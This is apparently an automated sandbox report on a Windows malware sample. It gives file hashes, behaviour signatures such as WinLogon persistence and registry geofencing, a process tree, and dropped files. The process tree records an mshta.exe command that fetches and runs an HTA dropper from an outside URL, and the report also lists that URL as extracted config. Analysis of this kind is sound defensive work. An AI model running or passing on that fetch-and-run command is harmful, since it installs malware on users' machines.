Overview

overview

10

Static

static

7

f9f8e07f3c...18.exe

windows7-x64

10

f9f8e07f3c...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    153s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-04-2024 09:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f9f8e07f3cb29331db336e4db624e1bf_JaffaCakes118.exe

  • Size

    840KB

  • MD5

    f9f8e07f3cb29331db336e4db624e1bf

  • SHA1

    c26080643e3435628ce84c769da7445f32224aaf

  • SHA256

    9d77f30678751ed6417beb09df31a5d5412233b4a1ff7df30e3d200e6cb496a3

  • SHA512

    3e0e12b1d64128d0615fa8659b89b32123cc6574e7a2ae31d92e45ec9d5f7efe0188035745a1bb674b1f4b4448c7500f3a1f637771190ade941d95c937ec640e

  • SSDEEP

    24576:94hOQ9PpEj3JApy8LTo7dPEIdKI8OIE9:aP6jJers3L8

Score
10/10
persistenceupx

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://repoiury.com/inst.php?id=lee_03&lang=ENU

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • UPX packed file 19 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f9f8e07f3cb29331db336e4db624e1bf_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\f9f8e07f3cb29331db336e4db624e1bf_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4836
    • C:\Users\Admin\AppData\Local\Temp\jh.exe
      "C:\Users\Admin\AppData\Local\Temp\jh.exe" lee_03
      2⤵
      • Modifies WinLogon for persistence
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2144
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\System32\mshta.exe" http://repoiury.com/inst.php?id=lee_03&lang=ENU
        3⤵
          PID:1344
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\asdfasfas.bat" "
          3⤵
            PID:4472
        • C:\Users\Admin\AppData\Local\Temp\jh1.exe
          "C:\Users\Admin\AppData\Local\Temp\jh1.exe"
          2⤵
          • Executes dropped EXE
          PID:1052
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1052 -s 480
            3⤵
            • Program crash
            PID:2180
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1052 -ip 1052
        1⤵
          PID:1256
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3708 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:2908

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\jh.exe
            Filesize

            527KB

            MD5

            f917e27ce3e7d6ddc2118ffee77ccc9f

            SHA1

            40740a1ed0e17b8cbe4d663a60e4c2406393b9dc

            SHA256

            9d6cf5358fdc4abe05d5a29f455ee5f13b33d16fb4a58cec7b92560b2825fd4c

            SHA512

            12c1bff7431b94dd51925fce0ac8d213a2b4a0e4c675edf51e3e562cb6ab6aa27977b0659c9bbd01b47489878597749af76b89ed7059796a6693928e337c2280

            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\jh1.exe
            Filesize

            151KB

            MD5

            82f59b03c50761995dc23a14aab79549

            SHA1

            cf684c5cc14c8e2bbc37e5db7b45ad1f58b2d362

            SHA256

            27128dfb362f3b2df16cb8db5e07aef0452fd73a7ebc1c9f426829923db8fe50

            SHA512

            f1c3b13b35bfdacfb34bb9112ef33fa75b88e31ad9864be994ed3e53b1352883ef33016f50581d6e6d12e2148002f71acd3a412c5f33a4d9aff00e5a2b13d4ce

            Download Submit
          • C:\Users\Admin\AppData\Roaming\asdfasfas.bat
            Filesize

            122B

            MD5

            fddfbd9d59143c6855c0e386b4af0446

            SHA1

            a60145bf547b703ec4cf078fd955fc690272eb00

            SHA256

            214aca25c648fad0c7f0b799343f07fb24ba4c7df95a0bd0cac13db70e1ea2d0

            SHA512

            a8f6dd937fb6c126994186e2e66a0c5dd8ef796ded55153f5f32bffe93f2743f55db9bb96288ab46201db1339e9b9b3c09d5c41da57ad3b668132cca7aac1003

            Download Submit
          • memory/2144-49-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-46-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-56-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-17-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-40-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-41-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-42-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-43-0x0000000000EE0000-0x0000000000EE1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2144-44-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-30-0x0000000000EE0000-0x0000000000EE1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2144-47-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-48-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-55-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-50-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-51-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-52-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-53-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/2144-54-0x0000000000400000-0x00000000007CA000-memory.dmp
            Filesize

            3.8MB

            Download
          • memory/4836-0-0x0000000000400000-0x0000000000507000-memory.dmp
            Filesize

            1.0MB

            Download
          • memory/4836-32-0x0000000000400000-0x0000000000507000-memory.dmp
            Filesize

            1.0MB

            Download